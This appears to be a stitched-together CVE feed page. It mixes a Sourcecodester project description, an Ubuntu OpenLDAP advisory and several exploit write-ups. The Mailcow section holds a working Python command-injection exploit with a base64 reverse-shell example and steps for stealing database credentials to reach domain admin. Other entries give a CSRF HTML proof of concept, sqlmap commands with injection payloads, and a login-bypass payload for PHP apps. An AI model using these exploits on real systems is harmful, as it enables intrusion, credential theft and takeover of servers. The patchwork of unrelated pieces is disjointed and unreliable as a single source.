Sourcecodester Covid-19 Directory on Vaccination System1.0 is vulnerable to SQL Injection via the admin/login.php txtusername (aka Username) field.

Submitted by Walterjnr1 on Monday, March 28, 2022 - 10:03.

****Introduction****

The aim of the study is to design a COVID-19 information management system that will accurately store and retrieve information on covid-19 vaccination in order to control the spread of the pandemic. This project was developed using **PHP Language** as the backend and **MySQL Database**. The application is a web-based platform to verify the vaccination record of the individual online.

It contains modules like:

****About the Covid-19 Directory on Vaccination System****

I developed this project using the following:

*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Bootstrap**

This **Covid-19 Directory on Vaccination System** can be accessed by the Public users and the management. The management has the privilege to access the admin/management panel of the system. The management side of the system requires the users to log system credentials in order to gain access to the records and manage it. The individuals can simply register to the system by filling all the fields that are required at the public site. To verify the individual's vaccination record and status, the user can navigate the site to Verification Panel and enter the Vaccination ID of the person. Upon submitting the Individual's Vaccination ID, the vaccination information of the individual will be shown.

****Features********Public****

*   **Home Page**
*   **Registration Form**
*   **Verification Panel**

****Admin****

*   **Login and Logout**
*   **Manage User Records**
*   **List all Records**
*   **Print Records**
*   **Update Account Credentials**

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Open** a browser and **browse** the **PHPMyAdmin. i.e** **http://localhost/phpmyadmin**
5.  **Create** a **new database** naming ****covid19****.
6.  **Import** the provided ****SQL**** file. The file is known as ****covid19.sql**** located inside the **db** folder.
7.  **Browse** the **Covid-19 Directory on Vaccination System** in a **browser**. i.e. ****http://localhost/covid-19-vaccination/**** for the public site and ****http://localhost/covid-19-vaccination/admin**** for the management site.

**Admin Default Access:**

Username: **admin**  
Password: admin123

**DEMO VIDEO:**

That's it. You can now explore the features and functionalities of this **Covid-19 Directory on Vaccination System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

For your research project contact us via Whatsapp on +2348067361023 or email us via: \[email protected\] or visit www.leastpayproject.com.ng

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1214 views

CVE-2022-28531: Design and Implementation of Covid-19 Directory on Vaccination System in PHP Source Code

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 13 and May 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for May 13 to May 20

Ubuntu Security Notice 5424-2 - USN-5424-1 fixed a vulnerability in OpenLDAP. This update provides the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. It was discovered that OpenLDAP incorrectly handled certain SQL statements within LDAP queries in the experimental back-sql backend. A remote attacker could possibly use this issue to perform an SQL injection attack and alter the database.

==========================================================================  
Ubuntu Security Notice USN-5424-2  
May 19, 2022

openldap vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

OpenLDAP could be made to perform arbitrary modifications to the database.

Software Description:  
- openldap: Lightweight Directory Access Protocol

Details:

USN-5424-1 fixed a vulnerability in OpenLDAP. This update provides  
the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.

Original advisory details:

 It was discovered that OpenLDAP incorrectly handled certain SQL statements  
 within LDAP queries in the experimental back-sql backend. A remote attacker  
 could possibly use this issue to perform an SQL injection attack and alter  
 the database.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
  slapd                           2.4.42+dfsg-2ubuntu3.13+esm1

Ubuntu 14.04 ESM:  
  slapd                           2.4.31-1+nmu2ubuntu8.5+esm5

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5424-2  
  https://ubuntu.com/security/notices/USN-5424-1  
  CVE-2022-29155

Ubuntu Security Notice USN-5424-2

mailcow before 2022-05d allows a remote authenticated user to inject OS commands and escalate privileges to domain admin via the --debug option in conjunction with the ---PIPEMESS option in Sync Jobs.

**Mailcow CVE-2022-31245**

CVE-2022-31245: RCE and Domain Admin privilege escalation for Mailcow. Including POC.  

Patched Version: https://github.com/mailcow/mailcow-dockerized/releases/tag/2022-05d  
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31245

**CVE-2022-31245: Command Injection, RCE**

Severity: 3/3  
Type: Command Injection, RCE, Domain Takeover  
Affected versions: least 2019 - 2022-05c  

A flaw exists in all recent Mailcow versions where a regular user of the system can exploit the “Sync Job” feature to gain a shell using a command injection in imapsync. Using this vunerability a attacker can then easily pivot to the database and escalate privileges to the role of “Domain Admin” in Mailcow.

This exploit includes persistence by default since Sync Jobs run on a timer.

This exploit compromises the entire Mailcow instance. Tested and working on release as of 2022-05c. Patched in 2022-05d.

**Technical overview**

Using the steps below the vulnerability can be recreated.

Gaining shell:

1.  Go to the Mailcow login page (not SOGo)
2.  Login as a regular user
3.  Go to Sync Jobs
4.  Set the following values: hostname=MAILCOW_IP, Port=IMAP_PORT, Username=CURRENT_USER, Password=CURRENT_PASS, Encryption=PLAIN, Interval=1, Active=Check, Custom Parameters=--debug --nosslcheck --PIPEMESS=CMD Where the field "Custom Parameters" is the important field. CMD can be a arbitrary shell command without spaces. Using uppercase is important!
5.  Press save and wait 1 min for the command to execute.

Custom Parameters example payload:

    --debug --nosslcheck --PIPEMESS=touch${IFS}test.txt
    

CMD cannot contain space,quotes or slashes use ${IFS} instead of space. Uppercase for --PIPEMESS is important to bypass check in functions.mailbox.inc.php at line 340:

if (strpos($custom\_params, 'pipemess')) {
	$custom\_params = '';
}

This uppercase command still works due to the fact that imapsync is case insensitive.

Privilege Escalation:

1.  After gaining shell on the dovcot container run env
2.  Find DBUSER and DBPASS
3.  Login to database using mysql and credentials
4.  Create new admin user or create a new admin API-key

**Proof-of-Concept, POC**

Automated POC. POC could in some cases need modification to run against non-local Mailcow instances.

#!/bin/python3

description \= """
Mailcow authenticated RCE. Only for educational purposes!!
By: ly1g3\[at\]tuta.io
This exploit can be used to get mailcow domain admin using mysql credentials found in "env" after getting shell.
Quotes, spaces and slash cant be used in cmd. Use ${IFS} as space. End command with ; is recommended.
Example reverse shell use: --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;' where PYTHON\_REVERSE\_SHELL\_BASE64 is python reverse shell.
Example usage: ./mailcow\_poc1.py --url https://192.168.1.2 --user test@local.com --passwd testpass --cmd 'echo${IFS}PYTHON\_REVERSE\_SHELL\_BASE64${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}sh;'
"""

import requests
import urllib
import sys
from urllib.parse import urlparse
import argparse
from argparse import RawTextHelpFormatter
from datetime import datetime

parser \= argparse.ArgumentParser(description\=description, formatter\_class\=RawTextHelpFormatter)
parser.add\_argument('--url', help\='Url to the mailcow server', required\=True)
parser.add\_argument('--user', help\='Mailcow username, example test@mailcow.com', required\=True)
parser.add\_argument('--passwd', help\='Mailcow user password', required\=True)
parser.add\_argument('--cmd', help\='Command to execute', required\=True)

args \= parser.parse\_args()

base\_url \= args.url
\# hostname = urlparse(base\_url).netloc
hostname \= '127.0.0.1'
user \= args.user
password \= args.passwd
cmd \= args.cmd

\# Get the required csrf token
def find\_csrf\_token(text):
    try:
        start1 \= text.index("var csrf\_token")
        start2 \= text.index("'", start1)
        end2 \= text.index("'", start2+1)
        csrf\_token \= text\[start2+1:end2\]
        return csrf\_token
    except:
        return ""

login\_url \= base\_url + '/'

s \= requests.Session()

\# Login
r1 \= s.post(login\_url, data\={'login\_user': user, 'pass\_user': password}, verify\=False)

token \= find\_csrf\_token(r1.text)
if not token:
    print("Error no token found, login problems?")
    sys.exit(0)
print(f"CSRF token: {token}")

sync\_url \= base\_url + '/api/v1/add/syncjob'

\# Create sync job with command injection
attr \= f'{{"host1":"{hostname}","port1":"143","user1":"{user}","password1":"{password}","enc1":"PLAIN","mins\_interval":"1","subfolder2":"","maxage":"0","maxbytespersecond":"0","timeout1":"10","timeout2":"10","exclude":"(?i)spam|(?i)junk","custom\_params":"--debug --nosslcheck --PIPEMESS={cmd}","subscribeall":"1","active":"1","csrf\_token":"{token}"}}'
r2 \= s.post(sync\_url, data\={'attr': attr, 'csrf\_token': token}, verify\=False)

c \= r2.content
if c.find(b"mailbox\_modified") != \-1:
    print("Success, rule modified")
elif c.find(b"object\_exists") != \-1:
    print("ERROR: Object exists, remove existing rule before running this")
    print(c)
    sys.exit(0)
else:
    print("ERROR: Something went wrong")
    print(c)
now \= datetime.now()
current\_time \= now.strftime("%H:%M:%S")
print("Command may take 1min to execute...")
print(f"Done at: {current\_time}")

CVE-2022-31245: GitHub - ly1g3/Mailcow-CVE-2022-31245: CVE-2022-31245: RCE and domain admin privilege escalation for Mailcow

A Cross-Site Request Forgery (CSRF) in Online Banquet Booking System v1.0 allows attackers to change admin credentials via a crafted POST request.

# Exploit Title: Online Banquet Booking System - 'change admin credentials' Cross-Site Request Forgery (CSRF)# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/online-banquet-booking-system-using-php-and-mysql/# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Description :The application is not using any security token to prevent it against CSRF. Therefore, malicious user can change admin credentials by using crafted post request.# HTTPS Request :POST /obbs/admin/admin-profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 86Origin: http://localhostConnection: closeReferer: http://localhost/obbs/admin/admin-profile.phpCookie: PHPSESSID=5lotcnigq4mddq3rr6tnnlvn3eUpgrade-Insecure-Requests: 1adminname=Admin&username=admin&email=admin%40gmail.com&mobilenumber=5689784589&submit=# Poc Html :<html>    <body>  <script>history.pushState('', '', '/')</script>    <form action="http://localhost/obbs/admin/admin-profile.php" method="POST">      <input type="hidden" name="adminname" value="Admin" />      <input type="hidden" name="username" value="admin" />      <input type="hidden" name="email" value="admin@gmail.com" />      <input type="hidden" name="mobilenumber" value="123" />      <input type="hidden" name="submit" value="" />      <input type="submit" value="Submit request" />    </form>  </body></html>

CVE-2022-28992: Online Banquet Booking System 1.0 Cross Site Request Forgery ≈ Packet Storm

Foxit PDF Editor v11.3.1 was discovered to contain an arbitrary file upload vulnerability.

CVE-2022-28104: Security Bulletins | Foxit Software

School Dormitory Management System v1.0 was discovered to contain a SQL injection vulnerability via the month parameter at /dms/admin/reports/daily_collection_report.php.

    # Exploit Title: School Dormitory Management System - 'month' SQL Injection# Date: 08/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 59 in file "/dms/admin/reports/daily_collection_report.php"$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");# Sqlmap command:sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: month (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report    Type: UNION query    Title: Generic UNION query (NULL) - 11 columns    Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report

CVE-2022-30886: School Dormitory Management System 1.0 SQL Injection ≈ Packet Storm

ChatBot Application with a Suggestion Feature 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /simple_chat_bot/admin/responses/view_response.php.

CVE-2022-30518

Simple Student Quarterly Result/Grade System v1.0 was discovered to contain a SQL injection vulnerability via /sqgs/Actions.php.

    # Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
    # Date: 11/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Linux 
    
    
    
    
    # Vulnerable Code
    
    line 57 in file "/sqgs/Actions.php"
    
    @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
    
    
    Steps To Reproduce:
    * - Go to the login page http://localhost/sqgs/login.php
    
    Payload:
    
    username: admin ' or '1'='1'#--
    password: \
    
    
    
    Proof of Concept :
    
    POST /sqgs/Actions.php?a=login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 51
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/sqgs/login.php
    Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
    
    username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi

CVE-2022-26633: Offensive Security’s Exploit Database Archive

Multi-Vendor Online Groceries Management System v1.0 was discovered to contain a blind SQL injection vulnerability via the id parameter in /products/view_product.php.

    # Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
    # Date: 11/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Windows 10
    
    
    # Vulnerable Code
    
    line 2 in file "mvogms/products/view_product.php
    
    $qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");
    
    # Sqlmap command:
    
    sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch
    
    # Output:
    
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: page=products/view_product&id=3' AND 9973=9973-- ogag
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ

Tag

#sql